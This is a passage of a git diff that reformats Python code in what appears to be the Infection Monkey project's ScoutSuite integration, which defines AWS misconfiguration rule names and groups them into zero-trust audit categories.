S3_BUCKET_AUTHENTICATEDUSERS_WRITE_ACP = 's3-bucket-AuthenticatedUsers-write_acp' - S3_BUCKET_AUTHENTICATEDUSERS_WRITE = 's3-bucket-AuthenticatedUsers-write' - S3_BUCKET_AUTHENTICATEDUSERS_READ_ACP = 's3-bucket-AuthenticatedUsers-read_acp' - S3_BUCKET_AUTHENTICATEDUSERS_READ = 's3-bucket-AuthenticatedUsers-read' - S3_BUCKET_ALLUSERS_WRITE_ACP = 's3-bucket-AllUsers-write_acp' - S3_BUCKET_ALLUSERS_WRITE = 's3-bucket-AllUsers-write' - S3_BUCKET_ALLUSERS_READ_ACP = 's3-bucket-AllUsers-read_acp' - S3_BUCKET_ALLUSERS_READ = 's3-bucket-AllUsers-read' - S3_BUCKET_WORLD_PUT_POLICY = 's3-bucket-world-Put-policy' - S3_BUCKET_WORLD_POLICY_STAR = 's3-bucket-world-policy-star' - S3_BUCKET_WORLD_LIST_POLICY = 's3-bucket-world-List-policy' - S3_BUCKET_WORLD_GET_POLICY = 's3-bucket-world-Get-policy' - S3_BUCKET_WORLD_DELETE_POLICY = 's3-bucket-world-Delete-policy' + S3_BUCKET_AUTHENTICATEDUSERS_WRITE_ACP = "s3-bucket-AuthenticatedUsers-write_acp" + S3_BUCKET_AUTHENTICATEDUSERS_WRITE = "s3-bucket-AuthenticatedUsers-write" + S3_BUCKET_AUTHENTICATEDUSERS_READ_ACP = "s3-bucket-AuthenticatedUsers-read_acp" + S3_BUCKET_AUTHENTICATEDUSERS_READ = "s3-bucket-AuthenticatedUsers-read" + S3_BUCKET_ALLUSERS_WRITE_ACP = "s3-bucket-AllUsers-write_acp" + S3_BUCKET_ALLUSERS_WRITE = "s3-bucket-AllUsers-write" + S3_BUCKET_ALLUSERS_READ_ACP = "s3-bucket-AllUsers-read_acp" + S3_BUCKET_ALLUSERS_READ = "s3-bucket-AllUsers-read" + S3_BUCKET_WORLD_PUT_POLICY = "s3-bucket-world-Put-policy" + S3_BUCKET_WORLD_POLICY_STAR = "s3-bucket-world-policy-star" + S3_BUCKET_WORLD_LIST_POLICY = "s3-bucket-world-List-policy" + S3_BUCKET_WORLD_GET_POLICY = "s3-bucket-world-Get-policy" + S3_BUCKET_WORLD_DELETE_POLICY = "s3-bucket-world-Delete-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py index 4cb875c6d..d1894144d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py @@ -1,8 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SESRules(RuleNameEnum): # Permissive policies - SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY = 'ses-identity-world-SendRawEmail-policy' - SES_IDENTITY_WORLD_SENDEMAIL_POLICY = 'ses-identity-world-SendEmail-policy' + SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY = "ses-identity-world-SendRawEmail-policy" + SES_IDENTITY_WORLD_SENDEMAIL_POLICY = "ses-identity-world-SendEmail-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py index 9fb847114..47e49a0d1 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py @@ -1,13 +1,15 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SNSRules(RuleNameEnum): # Permissive policies - SNS_TOPIC_WORLD_SUBSCRIBE_POLICY = 'sns-topic-world-Subscribe-policy' - SNS_TOPIC_WORLD_SETTOPICATTRIBUTES_POLICY 
= 'sns-topic-world-SetTopicAttributes-policy' - SNS_TOPIC_WORLD_REMOVEPERMISSION_POLICY = 'sns-topic-world-RemovePermission-policy' - SNS_TOPIC_WORLD_RECEIVE_POLICY = 'sns-topic-world-Receive-policy' - SNS_TOPIC_WORLD_PUBLISH_POLICY = 'sns-topic-world-Publish-policy' - SNS_TOPIC_WORLD_DELETETOPIC_POLICY = 'sns-topic-world-DeleteTopic-policy' - SNS_TOPIC_WORLD_ADDPERMISSION_POLICY = 'sns-topic-world-AddPermission-policy' + SNS_TOPIC_WORLD_SUBSCRIBE_POLICY = "sns-topic-world-Subscribe-policy" + SNS_TOPIC_WORLD_SETTOPICATTRIBUTES_POLICY = "sns-topic-world-SetTopicAttributes-policy" + SNS_TOPIC_WORLD_REMOVEPERMISSION_POLICY = "sns-topic-world-RemovePermission-policy" + SNS_TOPIC_WORLD_RECEIVE_POLICY = "sns-topic-world-Receive-policy" + SNS_TOPIC_WORLD_PUBLISH_POLICY = "sns-topic-world-Publish-policy" + SNS_TOPIC_WORLD_DELETETOPIC_POLICY = "sns-topic-world-DeleteTopic-policy" + SNS_TOPIC_WORLD_ADDPERMISSION_POLICY = "sns-topic-world-AddPermission-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py index cc5c774e3..84190ceb3 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py @@ -1,13 +1,17 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SQSRules(RuleNameEnum): # Permissive policies - SQS_QUEUE_WORLD_SENDMESSAGE_POLICY = 'sqs-queue-world-SendMessage-policy' - SQS_QUEUE_WORLD_RECEIVEMESSAGE_POLICY = 'sqs-queue-world-ReceiveMessage-policy' - SQS_QUEUE_WORLD_PURGEQUEUE_POLICY = 'sqs-queue-world-PurgeQueue-policy' - SQS_QUEUE_WORLD_GETQUEUEURL_POLICY = 'sqs-queue-world-GetQueueUrl-policy' - SQS_QUEUE_WORLD_GETQUEUEATTRIBUTES_POLICY = 'sqs-queue-world-GetQueueAttributes-policy' - SQS_QUEUE_WORLD_DELETEMESSAGE_POLICY = 'sqs-queue-world-DeleteMessage-policy' - SQS_QUEUE_WORLD_CHANGEMESSAGEVISIBILITY_POLICY = 'sqs-queue-world-ChangeMessageVisibility-policy' + SQS_QUEUE_WORLD_SENDMESSAGE_POLICY = "sqs-queue-world-SendMessage-policy" + SQS_QUEUE_WORLD_RECEIVEMESSAGE_POLICY = "sqs-queue-world-ReceiveMessage-policy" + SQS_QUEUE_WORLD_PURGEQUEUE_POLICY = "sqs-queue-world-PurgeQueue-policy" + SQS_QUEUE_WORLD_GETQUEUEURL_POLICY = "sqs-queue-world-GetQueueUrl-policy" + SQS_QUEUE_WORLD_GETQUEUEATTRIBUTES_POLICY = "sqs-queue-world-GetQueueAttributes-policy" + SQS_QUEUE_WORLD_DELETEMESSAGE_POLICY = "sqs-queue-world-DeleteMessage-policy" + SQS_QUEUE_WORLD_CHANGEMESSAGEVISIBILITY_POLICY = ( + "sqs-queue-world-ChangeMessageVisibility-policy" + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py index 4dcbd4f1a..f4ecba532 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py @@ -1,15 +1,17 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class VPCRules(RuleNameEnum): # Logging - SUBNET_WITHOUT_FLOW_LOG = 
'vpc-subnet-without-flow-log' + SUBNET_WITHOUT_FLOW_LOG = "vpc-subnet-without-flow-log" # Firewalls - SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS = 'vpc-subnet-with-allow-all-ingress-acls' - SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS = 'vpc-subnet-with-allow-all-egress-acls' - NETWORK_ACL_NOT_USED = 'vpc-network-acl-not-used' - DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS = 'vpc-default-network-acls-allow-all-ingress' - DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS = 'vpc-default-network-acls-allow-all-egress' - CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS = 'vpc-custom-network-acls-allow-all-ingress' - CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS = 'vpc-custom-network-acls-allow-all-egress' + SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS = "vpc-subnet-with-allow-all-ingress-acls" + SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS = "vpc-subnet-with-allow-all-egress-acls" + NETWORK_ACL_NOT_USED = "vpc-network-acl-not-used" + DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS = "vpc-default-network-acls-allow-all-ingress" + DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS = "vpc-default-network-acls-allow-all-egress" + CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS = "vpc-custom-network-acls-allow-all-ingress" + CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS = "vpc-custom-network-acls-allow-all-egress" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py index 251e57324..ddab1cfd6 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py @@ -2,17 +2,29 @@ from abc import ABC, abstractmethod from typing import List from common.common_consts import zero_trust_consts -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import CloudformationRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import CloudTrailRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import CloudWatchRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ConfigRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import ( + CloudformationRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import ( + CloudTrailRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import ( + CloudWatchRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ( + ConfigRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ec2_rules import EC2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elb_rules import ELBRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elbv2_rules import ELBv2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.iam_rules import IAMRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rds_rules import RDSRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import RedshiftRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import ( + RedshiftRules, +) +from 
monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.s3_rules import S3Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ses_rules import SESRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sns_rules import SNSRules @@ -34,47 +46,68 @@ class ScoutSuiteFindingMap(ABC): class PermissiveFirewallRules(ScoutSuiteFindingMap): - rules = [EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF, - EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS, EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP, - EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET, EC2Rules.SECURITY_GROUP_OPENS_PORT_RANGE, - EC2Rules.EC2_SECURITY_GROUP_WHITELISTS_AWS, - VPCRules.SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS, - VPCRules.SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS, - VPCRules.NETWORK_ACL_NOT_USED, - VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS, - VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS, - VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS, - VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS, - RDSRules.RDS_SECURITY_GROUP_ALLOWS_ALL, - RedshiftRules.REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL - ] + rules = [ + EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF, + EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS, + EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP, + EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET, + EC2Rules.SECURITY_GROUP_OPENS_PORT_RANGE, + EC2Rules.EC2_SECURITY_GROUP_WHITELISTS_AWS, + VPCRules.SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS, + VPCRules.SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS, + VPCRules.NETWORK_ACL_NOT_USED, + VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS, + VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS, + VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS, + VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS, + RDSRules.RDS_SECURITY_GROUP_ALLOWS_ALL, + RedshiftRules.REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL, + ] test = zero_trust_consts.TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES class UnencryptedData(ScoutSuiteFindingMap): - rules = [EC2Rules.EBS_SNAPSHOT_NOT_ENCRYPTED, EC2Rules.EBS_VOLUME_NOT_ENCRYPTED, - EC2Rules.EC2_INSTANCE_WITH_USER_DATA_SECRETS, - ELBv2Rules.ELBV2_LISTENER_ALLOWING_CLEARTEXT, 
ELBv2Rules.ELBV2_OLDER_SSL_POLICY, - RDSRules.RDS_INSTANCE_STORAGE_NOT_ENCRYPTED, RedshiftRules.REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED, - RedshiftRules.REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED, - S3Rules.S3_BUCKET_ALLOWING_CLEARTEXT, S3Rules.S3_BUCKET_NO_DEFAULT_ENCRYPTION, - ELBRules.ELB_LISTENER_ALLOWING_CLEARTEXT, - ELBRules.ELB_OLDER_SSL_POLICY] + rules = [ + EC2Rules.EBS_SNAPSHOT_NOT_ENCRYPTED, + EC2Rules.EBS_VOLUME_NOT_ENCRYPTED, + EC2Rules.EC2_INSTANCE_WITH_USER_DATA_SECRETS, + ELBv2Rules.ELBV2_LISTENER_ALLOWING_CLEARTEXT, + ELBv2Rules.ELBV2_OLDER_SSL_POLICY, + RDSRules.RDS_INSTANCE_STORAGE_NOT_ENCRYPTED, + RedshiftRules.REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED, + RedshiftRules.REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED, + S3Rules.S3_BUCKET_ALLOWING_CLEARTEXT, + S3Rules.S3_BUCKET_NO_DEFAULT_ENCRYPTION, + ELBRules.ELB_LISTENER_ALLOWING_CLEARTEXT, + ELBRules.ELB_OLDER_SSL_POLICY, + ] test = zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA class DataLossPrevention(ScoutSuiteFindingMap): - rules = [RDSRules.RDS_INSTANCE_BACKUP_DISABLED, RDSRules.RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD, - RDSRules.RDS_INSTANCE_SINGLE_AZ, S3Rules.S3_BUCKET_NO_MFA_DELETE, S3Rules.S3_BUCKET_NO_VERSIONING, - ELBv2Rules.ELBV2_NO_DELETION_PROTECTION] + rules = [ + RDSRules.RDS_INSTANCE_BACKUP_DISABLED, + RDSRules.RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD, + RDSRules.RDS_INSTANCE_SINGLE_AZ, + S3Rules.S3_BUCKET_NO_MFA_DELETE, + S3Rules.S3_BUCKET_NO_VERSIONING, + ELBv2Rules.ELBV2_NO_DELETION_PROTECTION, + ] test = zero_trust_consts.TEST_SCOUTSUITE_DATA_LOSS_PREVENTION @@ -91,7 +124,7 @@ class SecureAuthentication(ScoutSuiteFindingMap): IAMRules.IAM_ROOT_ACCOUNT_NO_MFA, IAMRules.IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS, IAMRules.IAM_USER_NO_INACTIVE_KEY_ROTATION, - IAMRules.IAM_USER_WITH_MULTIPLE_ACCESS_KEYS + IAMRules.IAM_USER_WITH_MULTIPLE_ACCESS_KEYS, ] test = zero_trust_consts.TEST_SCOUTSUITE_SECURE_AUTHENTICATION @@ -153,7 +186,7 @@ class RestrictivePolicies(ScoutSuiteFindingMap): SNSRules.SNS_TOPIC_WORLD_ADDPERMISSION_POLICY, SESRules.SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY, SESRules.SES_IDENTITY_WORLD_SENDEMAIL_POLICY, - RedshiftRules.REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE + RedshiftRules.REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE, ] test = zero_trust_consts.TEST_SCOUTSUITE_RESTRICTIVE_POLICIES @@ -173,7 +206,7 @@ class Logging(ScoutSuiteFindingMap): ELBv2Rules.ELBV2_NO_ACCESS_LOGS, VPCRules.SUBNET_WITHOUT_FLOW_LOG, ConfigRules.CONFIG_RECORDER_NOT_CONFIGURED, - RedshiftRules.REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED + RedshiftRules.REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED, ] test = zero_trust_consts.TEST_SCOUTSUITE_LOGGING @@ -185,7 +218,7 @@ class ServiceSecurity(ScoutSuiteFindingMap): ELBv2Rules.ELBV2_HTTP_REQUEST_SMUGGLING, RDSRules.RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED, RDSRules.RDS_INSTANCE_NO_MINOR_UPGRADE, - RedshiftRules.REDSHIFT_CLUSTER_NO_VERSION_UPGRADE + RedshiftRules.REDSHIFT_CLUSTER_NO_VERSION_UPGRADE, ] test = zero_trust_consts.TEST_SCOUTSUITE_SERVICE_SECURITY diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py index d19c2b216..e66c47782 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py @@ -1,5 +1,19 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import RestrictivePolicies, 
\ - SecureAuthentication, DataLossPrevention, UnencryptedData, PermissiveFirewallRules, ServiceSecurity, Logging +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ( + RestrictivePolicies, + SecureAuthentication, + DataLossPrevention, + UnencryptedData, + PermissiveFirewallRules, + ServiceSecurity, + Logging, +) -SCOUTSUITE_FINDINGS = [PermissiveFirewallRules, UnencryptedData, DataLossPrevention, SecureAuthentication, - RestrictivePolicies, Logging, ServiceSecurity] +SCOUTSUITE_FINDINGS = [ + PermissiveFirewallRules, + UnencryptedData, + DataLossPrevention, + SecureAuthentication, + RestrictivePolicies, + Logging, + ServiceSecurity, +] diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py index a31c83d3e..abbd48164 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py @@ -1,31 +1,31 @@ from enum import Enum -SERVICES = 'services' -FINDINGS = 'findings' +SERVICES = "services" +FINDINGS = "findings" class SERVICE_TYPES(Enum): - ACM = 'acm' - AWSLAMBDA = 'awslambda' - CLOUDFORMATION = 'cloudformation' - CLOUDTRAIL = 'cloudtrail' - CLOUDWATCH = 'cloudwatch' - CONFIG = 'config' - DIRECTCONNECT = 'directconnect' - EC2 = 'ec2' - EFS = 'efs' - ELASTICACHE = 'elasticache' - ELB = 'elb' - ELB_V2 = 'elbv2' - EMR = 'emr' - IAM = 'iam' - KMS = 'kms' - RDS = 'rds' - REDSHIFT = 'redshift' - ROUTE53 = 'route53' - S3 = 's3' - SES = 'ses' - SNS = 'sns' - SQS = 'sqs' - VPC = 'vpc' - SECRETSMANAGER = 'secretsmanager' + ACM = "acm" + AWSLAMBDA = "awslambda" + CLOUDFORMATION = "cloudformation" + CLOUDTRAIL = "cloudtrail" + CLOUDWATCH = "cloudwatch" + CONFIG = "config" + DIRECTCONNECT = "directconnect" + EC2 = "ec2" + EFS = "efs" + ELASTICACHE = "elasticache" + ELB = "elb" + ELB_V2 = "elbv2" + EMR = "emr" + IAM = "iam" + KMS = "kms" + RDS = "rds" + REDSHIFT = "redshift" + ROUTE53 = "route53" + S3 = "s3" + SES = "ses" + SNS = "sns" + SQS = "sqs" + VPC = "vpc" + SECRETSMANAGER = "secretsmanager" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py index 935f1c989..134ed3500 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py @@ -2,8 +2,9 @@ from enum import Enum from common.utils.code_utils import get_value_from_dict from common.utils.exceptions import RulePathCreatorNotFound -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators_list import \ - RULE_PATH_CREATORS_LIST +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators_list import ( + RULE_PATH_CREATORS_LIST, +) def __build_rule_to_rule_path_creator_hashmap(): @@ -18,7 +19,6 @@ RULE_TO_RULE_PATH_CREATOR_HASHMAP = __build_rule_to_rule_path_creator_hashmap() class RuleParser: - @staticmethod def get_rule_data(scoutsuite_data: dict, rule_name: Enum) -> dict: rule_path = RuleParser._get_rule_path(rule_name) @@ -34,5 +34,7 @@ class RuleParser: try: return RULE_TO_RULE_PATH_CREATOR_HASHMAP[rule_name] except KeyError: - raise RulePathCreatorNotFound(f"Rule path creator not found for rule {rule_name.value}. 
Make sure to assign" - f"this rule to any rule path creators.") + raise RulePathCreatorNotFound( + f"Rule path creator not found for rule {rule_name.value}. Make sure to assign" + f"this rule to any rule path creators." + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py index ee7f7c38b..56734e1a0 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py @@ -2,12 +2,16 @@ from abc import ABC, abstractmethod from enum import Enum from typing import List, Type -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum -from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import FINDINGS, SERVICE_TYPES +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import ( + FINDINGS, + SERVICE_TYPES, +) class AbstractRulePathCreator(ABC): - @property @abstractmethod def service_type(self) -> SERVICE_TYPES: @@ -20,5 +24,5 @@ class AbstractRulePathCreator(ABC): @classmethod def build_rule_path(cls, rule_name: Enum) -> List[str]: - assert(rule_name in cls.supported_rules) + assert rule_name in cls.supported_rules return [cls.service_type.value, FINDINGS, rule_name.value] diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py index 10adb474c..40e438eba 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import CloudformationRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import ( + CloudformationRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudformationRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py index 2f626dfd5..928cd138e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py +++ 
